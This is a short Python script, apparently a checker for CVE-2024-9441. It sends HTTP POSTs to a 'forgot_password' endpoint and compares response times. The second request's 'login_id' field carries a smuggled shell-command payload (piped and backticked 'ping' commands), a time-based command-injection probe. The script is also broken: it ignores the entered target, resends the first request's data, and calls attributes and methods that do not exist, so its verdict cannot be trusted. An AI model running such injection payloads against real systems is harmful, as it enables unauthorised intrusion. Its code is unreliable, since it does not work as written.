import requests
import sys

target = input("Enter Target IP and Port (127.0.0.1:80): ")
print("Checking for CVE-2024-9441 using ping payload...")


burp0_url = "http://target/?c=user&m=forgot_password"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Origin": "http://target", "Connection": "keep-alive", "Referer": "http://target/"}
burp0_data = {"login_id": "test"}
requests.post(burp0_url, headers=burp0_headers, data=burp0_data)

init_elapsed = requests.elapsed.total_seconds()

burp1_url = "http://target/?c=user&m=forgot_password"
burp1_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Origin": "http://target", "Connection": "keep-alive", "Referer": "http://target/"}
burp1_data = {"login_id": "test|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\\\" |ping -n 21 127.0.0.1"}
requests.post(burp0_url, headers=burp0_headers, data=burp0_data)

check_tme = requests.elapsed.total_seconds()


if(check_time >= init_elapsed):
	print("Target is likely vulnerable!")
	print("Test 1:"+init_elapsed.string())
	print("Test 2:"+check_tme.string())
else:
	print("Target response times indicate not vulnerable.")